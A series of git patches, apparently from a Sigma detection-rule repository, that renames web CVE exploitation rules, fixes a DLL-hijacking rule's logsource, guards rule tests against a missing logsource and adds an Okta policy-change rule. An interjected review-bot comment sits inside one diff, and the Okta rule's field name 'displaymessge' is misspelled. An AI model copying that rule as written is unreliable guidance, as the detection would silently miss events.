 rename rules/web/{web_cve-2010-1304_exploitation_attempt.yaml => web_cve-2010-1304_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1305_exploitation_attempt.yaml => web_cve-2010-1305_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1306_exploitation_attempt.yaml => web_cve-2010-1306_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1307_exploitation_attempt.yaml => web_cve-2010-1307_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1308_exploitation_attempt.yaml => web_cve-2010-1308_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1312_exploitation_attempt.yaml => web_cve-2010-1312_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1313_exploitation_attempt.yaml => web_cve-2010-1313_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1314_exploitation_attempt.yaml => web_cve-2010-1314_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1345_exploitation_attempt.yaml => web_cve-2010-1345_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1353_exploitation_attempt.yaml => web_cve-2010-1353_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1354_exploitation_attempt.yaml => web_cve-2010-1354_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1470_exploitation_attempt.yaml => web_cve-2010-1470_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1471_exploitation_attempt.yaml => web_cve-2010-1471_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1472_exploitation_attempt.yaml => web_cve-2010-1472_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1473_exploitation_attempt.yaml => web_cve-2010-1473_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1474_exploitation_attempt.yaml => web_cve-2010-1474_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1475_exploitation_attempt.yaml => web_cve-2010-1475_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1476_exploitation_attempt.yaml => web_cve-2010-1476_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1494_exploitation_attempt.yaml => web_cve-2010-1494_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1495_exploitation_attempt.yaml => web_cve-2010-1495_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1532_exploitation_attempt.yaml => web_cve-2010-1532_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1533_exploitation_attempt.yaml => web_cve-2010-1533_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1534_exploitation_attempt.yaml => web_cve-2010-1534_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1535_exploitation_attempt.yaml => web_cve-2010-1535_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1601_exploitation_attempt.yaml => web_cve-2010-1601_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1602_exploitation_attempt.yaml => web_cve-2010-1602_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1607_exploitation_attempt.yaml => web_cve-2010-1607_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1657_exploitation_attempt.yaml => web_cve-2010-1657_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1659_exploitation_attempt.yaml => web_cve-2010-1659_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1714_exploitation_attempt.yaml => web_cve-2010-1714_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1717_exploitation_attempt.yaml => web_cve-2010-1717_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1718_exploitation_attempt.yaml => web_cve-2010-1718_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1719_exploitation_attempt.yaml => web_cve-2010-1719_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1722_exploitation_attempt.yaml => web_cve-2010-1722_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1875_exploitation_attempt.yaml => web_cve-2010-1875_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1953_exploitation_attempt.yaml => web_cve-2010-1953_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1954_exploitation_attempt.yaml => web_cve-2010-1954_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1955_exploitation_attempt.yaml => web_cve-2010-1955_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1956_exploitation_attempt.yaml => web_cve-2010-1956_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1979_exploitation_attempt.yaml => web_cve-2010-1979_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1980_exploitation_attempt.yaml => web_cve-2010-1980_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1981_exploitation_attempt.yaml => web_cve-2010-1981_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-1983_exploitation_attempt.yaml => web_cve-2010-1983_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-2033_exploitation_attempt.yaml => web_cve-2010-2033_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-2034_exploitation_attempt.yaml => web_cve-2010-2034_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-2035_exploitation_attempt.yaml => web_cve-2010-2035_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-2036_exploitation_attempt.yaml => web_cve-2010-2036_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-2122_exploitation_attempt.yaml => web_cve-2010-2122_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-2259_exploitation_attempt.yaml => web_cve-2010-2259_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-2307_exploitation_attempt.yaml => web_cve-2010-2307_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-2682_exploitation_attempt.yaml => web_cve-2010-2682_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-2861_exploitation_attempt.yaml => web_cve-2010-2861_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-2920_exploitation_attempt.yaml => web_cve-2010-2920_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-3426_exploitation_attempt.yaml => web_cve-2010-3426_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-4231_exploitation_attempt.yaml => web_cve-2010-4231_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-4617_exploitation_attempt.yaml => web_cve-2010-4617_exploitation_attempt.yml} (100%)
 rename rules/web/{web_cve-2010-5278_exploitation_attempt.yaml => web_cve-2010-5278_exploitation_attempt.yml} (100%)
diff --git a/rules/web/web_cve-2010-0943_exploitation_attempt.yaml b/rules/web/web_cve-2010-0943_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-0943_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-0943_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-0944_exploitation_attempt.yaml b/rules/web/web_cve-2010-0944_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-0944_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-0944_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-0985_exploitation_attempt.yaml b/rules/web/web_cve-2010-0985_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-0985_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-0985_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1219_exploitation_attempt.yaml b/rules/web/web_cve-2010-1219_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1219_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1219_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1304_exploitation_attempt.yaml b/rules/web/web_cve-2010-1304_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1304_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1304_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1305_exploitation_attempt.yaml b/rules/web/web_cve-2010-1305_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1305_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1305_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1306_exploitation_attempt.yaml b/rules/web/web_cve-2010-1306_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1306_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1306_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1307_exploitation_attempt.yaml b/rules/web/web_cve-2010-1307_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1307_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1307_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1308_exploitation_attempt.yaml b/rules/web/web_cve-2010-1308_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1308_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1308_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1312_exploitation_attempt.yaml b/rules/web/web_cve-2010-1312_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1312_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1312_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1313_exploitation_attempt.yaml b/rules/web/web_cve-2010-1313_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1313_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1313_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1314_exploitation_attempt.yaml b/rules/web/web_cve-2010-1314_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1314_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1314_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1345_exploitation_attempt.yaml b/rules/web/web_cve-2010-1345_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1345_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1345_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1353_exploitation_attempt.yaml b/rules/web/web_cve-2010-1353_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1353_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1353_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1354_exploitation_attempt.yaml b/rules/web/web_cve-2010-1354_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1354_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1354_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1470_exploitation_attempt.yaml b/rules/web/web_cve-2010-1470_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1470_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1470_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1471_exploitation_attempt.yaml b/rules/web/web_cve-2010-1471_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1471_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1471_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1472_exploitation_attempt.yaml b/rules/web/web_cve-2010-1472_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1472_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1472_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1473_exploitation_attempt.yaml b/rules/web/web_cve-2010-1473_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1473_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1473_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1474_exploitation_attempt.yaml b/rules/web/web_cve-2010-1474_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1474_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1474_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1475_exploitation_attempt.yaml b/rules/web/web_cve-2010-1475_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1475_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1475_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1476_exploitation_attempt.yaml b/rules/web/web_cve-2010-1476_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1476_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1476_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1494_exploitation_attempt.yaml b/rules/web/web_cve-2010-1494_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1494_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1494_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1495_exploitation_attempt.yaml b/rules/web/web_cve-2010-1495_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1495_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1495_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1532_exploitation_attempt.yaml b/rules/web/web_cve-2010-1532_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1532_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1532_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1533_exploitation_attempt.yaml b/rules/web/web_cve-2010-1533_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1533_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1533_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1534_exploitation_attempt.yaml b/rules/web/web_cve-2010-1534_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1534_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1534_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1535_exploitation_attempt.yaml b/rules/web/web_cve-2010-1535_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1535_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1535_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1601_exploitation_attempt.yaml b/rules/web/web_cve-2010-1601_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1601_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1601_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1602_exploitation_attempt.yaml b/rules/web/web_cve-2010-1602_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1602_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1602_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1607_exploitation_attempt.yaml b/rules/web/web_cve-2010-1607_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1607_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1607_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1657_exploitation_attempt.yaml b/rules/web/web_cve-2010-1657_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1657_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1657_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1659_exploitation_attempt.yaml b/rules/web/web_cve-2010-1659_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1659_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1659_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1714_exploitation_attempt.yaml b/rules/web/web_cve-2010-1714_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1714_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1714_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1717_exploitation_attempt.yaml b/rules/web/web_cve-2010-1717_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1717_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1717_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1718_exploitation_attempt.yaml b/rules/web/web_cve-2010-1718_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1718_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1718_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1719_exploitation_attempt.yaml b/rules/web/web_cve-2010-1719_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1719_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1719_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1722_exploitation_attempt.yaml b/rules/web/web_cve-2010-1722_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1722_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1722_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1875_exploitation_attempt.yaml b/rules/web/web_cve-2010-1875_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1875_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1875_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1953_exploitation_attempt.yaml b/rules/web/web_cve-2010-1953_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1953_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1953_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1954_exploitation_attempt.yaml b/rules/web/web_cve-2010-1954_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1954_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1954_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1955_exploitation_attempt.yaml b/rules/web/web_cve-2010-1955_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1955_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1955_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1956_exploitation_attempt.yaml b/rules/web/web_cve-2010-1956_exploitation_attempt.yml
similarity index 100%
rename from rules/web/web_cve-2010-1956_exploitation_attempt.yaml
rename to rules/web/web_cve-2010-1956_exploitation_attempt.yml
diff --git a/rules/web/web_cve-2010-1979_exploitation_attempt.yaml b/rules/web/web_cve-2010-1979_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1979_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1979_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1980_exploitation_attempt.yaml b/rules/web/web_cve-2010-1980_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1980_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1980_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1981_exploitation_attempt.yaml b/rules/web/web_cve-2010-1981_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1981_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1981_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-1983_exploitation_attempt.yaml b/rules/web/web_cve-2010-1983_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-1983_exploitation_attempt.yaml rename to rules/web/web_cve-2010-1983_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2033_exploitation_attempt.yaml b/rules/web/web_cve-2010-2033_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2033_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2033_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2034_exploitation_attempt.yaml b/rules/web/web_cve-2010-2034_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2034_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2034_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2035_exploitation_attempt.yaml b/rules/web/web_cve-2010-2035_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2035_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2035_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-2036_exploitation_attempt.yaml b/rules/web/web_cve-2010-2036_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2036_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2036_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2122_exploitation_attempt.yaml b/rules/web/web_cve-2010-2122_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2122_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2122_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2259_exploitation_attempt.yaml b/rules/web/web_cve-2010-2259_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2259_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2259_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2307_exploitation_attempt.yaml b/rules/web/web_cve-2010-2307_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2307_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2307_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2682_exploitation_attempt.yaml b/rules/web/web_cve-2010-2682_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2682_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2682_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2861_exploitation_attempt.yaml b/rules/web/web_cve-2010-2861_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2861_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2861_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-2920_exploitation_attempt.yaml b/rules/web/web_cve-2010-2920_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-2920_exploitation_attempt.yaml rename to rules/web/web_cve-2010-2920_exploitation_attempt.yml 
diff --git a/rules/web/web_cve-2010-3426_exploitation_attempt.yaml b/rules/web/web_cve-2010-3426_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-3426_exploitation_attempt.yaml rename to rules/web/web_cve-2010-3426_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-4231_exploitation_attempt.yaml b/rules/web/web_cve-2010-4231_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-4231_exploitation_attempt.yaml rename to rules/web/web_cve-2010-4231_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-4617_exploitation_attempt.yaml b/rules/web/web_cve-2010-4617_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-4617_exploitation_attempt.yaml rename to rules/web/web_cve-2010-4617_exploitation_attempt.yml diff --git a/rules/web/web_cve-2010-5278_exploitation_attempt.yaml b/rules/web/web_cve-2010-5278_exploitation_attempt.yml similarity index 100% rename from rules/web/web_cve-2010-5278_exploitation_attempt.yaml rename to rules/web/web_cve-2010-5278_exploitation_attempt.yml From 3c0c1706dcc745934cae3076815cf482b4dfa83f Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sun, 12 Sep 2021 23:06:01 +0530 Subject: [PATCH 0889/1367] Changed --- rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index bbb1219f..1fecf839 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -15,7 +15,7 @@ tags: - attack.defense_evasion - attack.t1574.001 logsource: - service: sysmon + service: file_event product: windows detection: selection: From 0c092cd1064b997eff6de5e377479d6b76f62c24 Mon Sep 17 00:00:00 2001 
From: pbssubhash
Date: Sun, 12 Sep 2021 23:11:46 +0530
Subject: [PATCH 0890/1367] Final changes
---
 rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml
index 1fecf839..702dcf29 100644
--- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml
+++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml
@@ -15,7 +15,7 @@ tags:
 - attack.defense_evasion
 - attack.t1574.001
 logsource:
- service: file_event
+ category: file_event
 product: windows
 detection:
 selection:
From e6d4cb15bd14dd967d53993abf86cbd4d95b4c34 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Sun, 12 Sep 2021 20:04:58 +0200
Subject: [PATCH 0891/1367] fix NoneType error
---
 tests/test_rules.py | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/tests/test_rules.py b/tests/test_rules.py
index 9cfd82c0..045268f5 100755
--- a/tests/test_rules.py
+++ b/tests/test_rules.py
@@ -585,6 +585,10 @@ class TestRules(unittest.TestCase):
 ]
 for file in self.yield_next_rule_file_path(self.path_to_rules):
 logsource = self.get_rule_part(file_path=file, part_name="logsource")
+ if not logsource:
+ print(Fore.RED + "Rule {} has no 'logsource'.".format(file))
+ faulty_rules.append(file)
+ continue
 valid = True
 for key in logsource:
 if key.lower() not in valid_logsource:
From 29490f350d7c8ff26205f6517d305d45c9134e8e Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Sun, 12 Sep 2021 20:13:58 +0200
Subject: [PATCH 0892/1367] fix NoneType object has no attribute get
---
 tests/test_rules.py | 21 +++++++++++----------
 1 file changed, 11 insertions(+), 10 deletions(-)
diff --git a/tests/test_rules.py b/tests/test_rules.py
index 045268f5..d4f2e0ef 100755
--- a/tests/test_rules.py
+++ b/tests/test_rules.py
@@ -308,16 +308,17 @@ class TestRules(unittest.TestCase):
 faulty_rules = []
 for file in self.yield_next_rule_file_path(self.path_to_rules):
 logsource = self.get_rule_part(file_path=file, part_name="logsource")
- service = logsource.get('service', '')
- if service.lower() == 'sysmon':
- with open(file,encoding='utf-8') as f:
- found = False
- for line in f:
- if re.search(r'.*EventID:.*$', line): # might be on a single line or in multiple lines
- found = True
- break
- if not found:
- faulty_rules.append(file)
+ if logsource:
+ service = logsource.get('service', '')
+ if service.lower() == 'sysmon':
+ with open(file,encoding='utf-8') as f:
+ found = False
+ for line in f:
+ if re.search(r'.*EventID:.*$', line): # might be on a single line or in multiple lines
+ found = True
+ break
+ if not found:
+ faulty_rules.append(file)
 self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using sysmon events but with no EventID specified")
From 0d51178174a7c81a288dc571b5a9673f3f0f71f2 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sun, 12 Sep 2021 19:13:15 -0500
Subject: [PATCH 0893/1367] Create okta_policy_modified_or_deleted.yml
---
 .../okta/okta_policy_modified_or_deleted.yml | 24 +++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 rules/cloud/okta/okta_policy_modified_or_deleted.yml
diff --git a/rules/cloud/okta/okta_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_modified_or_deleted.yml
new file mode 100644
index 00000000..494af5b5
--- /dev/null
+++ b/rules/cloud/okta/okta_policy_modified_or_deleted.yml
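Review bot: The new `if logsource:` wrapper makes a rule with no logsource section silently pass this sysmon/EventID test, while the guard added to the logsource-key test in the preceding patch (`if not logsource:` in the -585 hunk) prints a message and records the file in faulty_rules. The two tests now disagree about whether a missing logsource is a fault, and a rule that fails to parse its logsource will only be reported by one of them. Using the same guard-and-continue shape here, `if not logsource: faulty_rules.append(file); continue` at the top of the loop body with the original block left at its old indentation, keeps the behaviour consistent and avoids re-indenting nine lines. The enclosing test method's `def` line is outside the hunk; only its tail (the assertEqual) is visible.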
@@ -0,0 +1,24 @@
+title: Okta Policy Modified or Deleted
+id: 1667a172-ed4c-463c-9969-efd92195319a
+description: Detects when an Okta policy is modified or deleted.
+author: Austin Songer
+status: experimental
+date: 2021/09/12
+references:
+ - https://developer.okta.com/docs/reference/api/system-log/
+ - https://developer.okta.com/docs/reference/api/event-types/
+logsource:
+ service: okta
+detection:
+ selection:
+ displaymessge:
+ - policy.lifecycle.update
+ - policy.lifecycle.delete
+ condition: selection
+level: low
+tags:
+ - attack.impact
+falsepositives:
+ - Okta Policies being modified or deleted may be performed by a system administrator.
+ - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From ebd120a16507db1f5e745fa575e7b6be8f43e5bf Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sun, 12 Sep 2021 19:17:00 -0500
Subject: [PATCH 0894/1367] Create okta_application_modified_or_deleted.yml
---
 rules/cloud/okta/okta_application_modified_or_deleted.yml | 1 +
 1 file changed, 1 insertion(+)
 create mode 100644 rules/cloud/okta/okta_application_modified_or_deleted.yml
diff --git a/rules/cloud/okta/okta_application_modified_or_deleted.yml b/rules/cloud/okta/okta_application_modified_or_deleted.yml
new file mode 100644
index 00000000..41a74b12
--- /dev/null
+++ b/rules/cloud/okta/okta_application_modified_or_deleted.yml
@@ -0,0 +1 @@
+NOT READY YET
From 76d78c274ae31ffb18ea312f973830b9ddf93bb0 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sun, 12 Sep 2021 19:17:25 -0500
Subject: [PATCH 0895/1367] Create okta_policy_rule_modified_or_deleted.yml
---
